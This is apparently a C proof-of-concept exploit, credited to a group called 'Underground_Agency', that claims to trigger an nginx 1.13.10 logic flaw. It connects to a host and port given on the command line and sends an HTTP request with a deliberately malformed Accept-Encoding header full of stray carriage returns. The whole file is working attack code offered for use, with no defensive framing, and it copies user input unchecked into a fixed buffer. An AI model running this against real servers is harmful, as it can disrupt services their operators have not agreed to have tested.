|
// Underground_Agency (UA) - (koa, bacL, g3kko, Dostoyevsky)
// trigger nginx 1.13.10 (latest) logic flaw / bug
// ~2018
// Tested on Ubuntu 17.10 x86 4.13.0-21-generic
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <time.h>
int main(int argc, char **argv){
int sockfd, ret;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if(sockfd < 0){
perror("socket");
exit(EXIT_FAILURE);
}
struct sockaddr_in servAddr;
memset(&servAddr, 0, sizeof(servAddr));
servAddr.sin_family = AF_INET;
servAddr.sin_port = htons(atoi(argv[2]));
servAddr.sin_addr.s_addr = inet_addr(argv[1]);
ret = connect(sockfd, (struct sockaddr *)&servAddr, sizeof(servAddr));
if(ret < 0){
perror("connect");
exit(EXIT_FAILURE);
}
char buf[2048];
strcpy(buf, "GET / HTTP/1.1\r\nHost: ");
strcat(buf, argv[1]);
strcat(buf, "\r\n");
strcat(buf, "Connection: close\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\n");
char *buf2 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
"Accept-Encoding: gzip, deflate\r\n\rrrrr\r\r\r\r\\rr\rrrrrr" // bug
"Accept-Language: en-US,en;q=0.9\r\n\r\n";
strcat(buf, buf2);
char recvbuf[1024];
ret = send(sockfd, buf, strlen(buf), 0);
if(ret < 0){
perror("send");
exit(EXIT_FAILURE);
}
printf("Successfully sent data\n");
ret = recv(sockfd, recvbuf, 1024, 0);
if(ret < 0){
perror("recv");
exit(EXIT_FAILURE);
}
printf("Data: %s\n", recvbuf);
close(sockfd);
exit(EXIT_SUCCESS);
}
|
| |
|
推荐
评论(0条)
